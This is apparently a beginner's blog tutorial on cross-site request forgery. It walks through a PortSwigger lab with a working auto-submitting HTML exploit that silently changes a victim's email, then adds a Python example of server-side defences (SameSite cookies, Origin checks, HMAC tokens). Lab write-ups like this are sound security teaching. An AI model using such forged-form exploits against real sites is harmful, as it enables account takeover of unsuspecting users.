Cross-Site Request Forgery (CSRF) is an attack that induces a user who is currently logged in to a web application to perform unwanted actions. An attacker can perform social engineering to persuade users of a web application to carry out their desired actions (for example, by sending a link via email or chat). If the victim is a regular user, a successful CSRF attack can force them to carry out state-changing operations like money transfers, email address changes, and other similar tasks. The entire web application may be compromised by CSRF if the victim is an administrative account.
How does a CSRF attack work?
Synopsys has done a great job of explaining, with an example, how a Cross-Site Request Forgery attack works. For preventing CSRF, check out the OWASP cheat sheet.
Bug Bounty
It’s difficult to understand why CSRF is still so common: there are many protections that can be implemented easily at both the application level and the server level. Yet CSRF bugs are still being found every day, and they are often quite severe. Around 5 months ago, a security researcher was awarded $10,000 for a bug he reported to GitHub.
Practical Labs
Before we start, I want to clear up something important. You’ll see scripting here, and as a beginner it may scare you, but you don’t have to worry about that: there are lots of professionals who don’t know how to code but are very good at their job. You do, however, need to understand some concepts of how the code in a web application works; only then will you be able to identify vulnerabilities more easily and faster than others. All the payloads are available online, and you don’t need to learn JavaScript the way a web developer would, just enough to understand the concepts, because that’s where we find the vulnerabilities. For that, I would recommend FreeCodeCamp.
This lab is very important for understanding CSRF; once you get the concept behind it, you’ll be able to solve the other labs. Let’s get started.
This lab’s email change functionality is vulnerable to CSRF.
To solve the lab, craft some HTML that uses a CSRF attack to change the viewer’s email address and upload it to your exploit server.
You can log in to your own account using the following credentials: wiener:peter
After logging in with those credentials, open the “My account” page.
Just to see what happens behind the scenes, we’ll use Burp Suite to intercept the traffic when we update the email. I’ll be using the Firefox developer tools:
Use the following HTML template and fill in the request’s method, URL and body parameters. The page shows the victim “Pwned!” while changing their email in the background:
<html>
<body>
  <h1>Pwned!</h1>
  <!-- Hidden iframe: the form posts into it, so the victim's tab never navigates away -->
  <iframe style="display:none" name="csrf-iframe"></iframe>
  <!-- Method, URL and parameter names copied from the intercepted change-email request -->
  <form action="https://0a7e00bc03fe2d48c09f4d1200b800cb.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe" id="csrf-form">
    <input type="hidden" name="email" value="darth@test.com">
  </form>
  <!-- Submit automatically as soon as the page loads; the browser attaches the victim's session cookie -->
  <script>document.getElementById("csrf-form").submit()</script>
</body>
</html>
Go to the exploit server, paste your exploit HTML into the “Body” section, and click “Store”. To verify that the exploit works, try it on yourself by clicking “View exploit” and then check the resulting HTTP request and response. Click “Deliver to victim” to solve the lab.
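The lab’s change-email endpoint accepts the forged POST because it trusts the session cookie alone. To make concrete the “easy protections” mentioned in the Bug Bounty section, here is an added example (written for this post, not the lab’s or PortSwigger’s code) of how a server could validate that same request: a SameSite session cookie, an Origin/Referer check, and a per-session synchronizer token. The secret, session store, exploit-server host and request dictionaries are constructed for the example; the application origin is the lab URL from the exploit above.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Constructed values for this example; a real deployment keeps the secret out of source.
SERVER_SECRET = b"example-only-secret-not-for-production"
APP_ORIGIN = "https://0a7e00bc03fe2d48c09f4d1200b800cb.web-security-academy.net"
SESSION_COOKIE = "session"


def new_session_id() -> str:
    """Random, unguessable session identifier (hypothetical session store)."""
    return secrets.token_urlsafe(32)


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session. SameSite=Lax makes the browser withhold the
    cookie on a cross-site POST such as the auto-submitted form on the exploit page."""
    return f"{SESSION_COOKIE}={session_id}; Secure; HttpOnly; SameSite=Lax; Path=/"


def csrf_token_for(session_id: str) -> str:
    """Synchronizer token bound to the session with an HMAC, so the server stores nothing
    extra and a token captured from one session is useless in another."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def parse_cookies(header: str) -> dict:
    """Minimal Cookie header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, _, value = part.strip().partition("=")
            cookies[name] = value
    return cookies


def check_change_email(request: dict) -> tuple:
    """Validate a change-email request. `request` is a simplified representation with
    keys method, headers (lower-case names) and body (form-encoded).
    Returns (accepted, reason_or_new_email)."""
    if request["method"] != "POST":
        return False, "state change must use POST"
    headers = request["headers"]
    session_id = parse_cookies(headers.get("cookie", "")).get(SESSION_COOKIE)
    if not session_id:
        return False, "no session"
    # Layer 1: browsers set Origin on cross-origin POSTs and a page cannot override it.
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False, "missing Origin/Referer"
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != APP_ORIGIN:
        return False, f"cross-origin request from {parsed.netloc}"
    # Layer 2: a token the attacker's page cannot read, thanks to the same-origin policy.
    params = parse_qs(request["body"])
    submitted = params.get("csrf", [""])[0]
    if not hmac.compare_digest(submitted.encode(), csrf_token_for(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, params.get("email", [""])[0]


VICTIM_SESSION = new_session_id()

# Constructed: the request the user's own account page sends, token included in the form.
legit_request = {
    "method": "POST",
    "headers": {"origin": APP_ORIGIN, "cookie": f"{SESSION_COOKIE}={VICTIM_SESSION}"},
    "body": f"email=wiener%40example.com&csrf={csrf_token_for(VICTIM_SESSION)}",
}

# Constructed: what the exploit page's auto-submitted form produces when the browser still
# attaches the cookie (no SameSite). Origin is the attacker's host and no token is present.
forged_request = {
    "method": "POST",
    "headers": {"origin": "https://exploit-server.example",
                "cookie": f"{SESSION_COOKIE}={VICTIM_SESSION}"},
    "body": "email=darth%40test.com",
}


def demo() -> tuple:
    """Run both requests through the check; the forged one is rejected at the Origin layer."""
    return check_change_email(legit_request), check_change_email(forged_request)


if __name__ == "__main__":
    print(session_cookie_header(VICTIM_SESSION))
    print(demo())
```

The layers are deliberately independent: if the cookie is issued with SameSite=Lax the forged POST never carries a session at all; if a legacy client omits Origin and Referer the request is refused rather than waved through; and a same-origin request that lacks the token (for example one replayed without it) still fails the final check. Compare this with the lab endpoint, which only ever looks at the cookie.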
Conclusion
We’ve covered the basic theoretical and practical knowledge needed to understand what a Cross-Site Request Forgery vulnerability is and how to exploit it hands-on. If you’re interested in cross-site attacks, check out my blog on XSS. We only covered the basic practical labs; the remaining ones are for you to practice, get more familiar with the topic and learn your own way through it. You will find video solutions of the labs under the “community solutions” section, and you can also find write-ups for them, but if you’re having any problem with anything, feel free to contact me and I’ll reply as soon as possible. That’s it for today’s topic. I hope you liked it and learned something new from it, and I will appreciate your support. Thanks for reading, and see you on the next topic.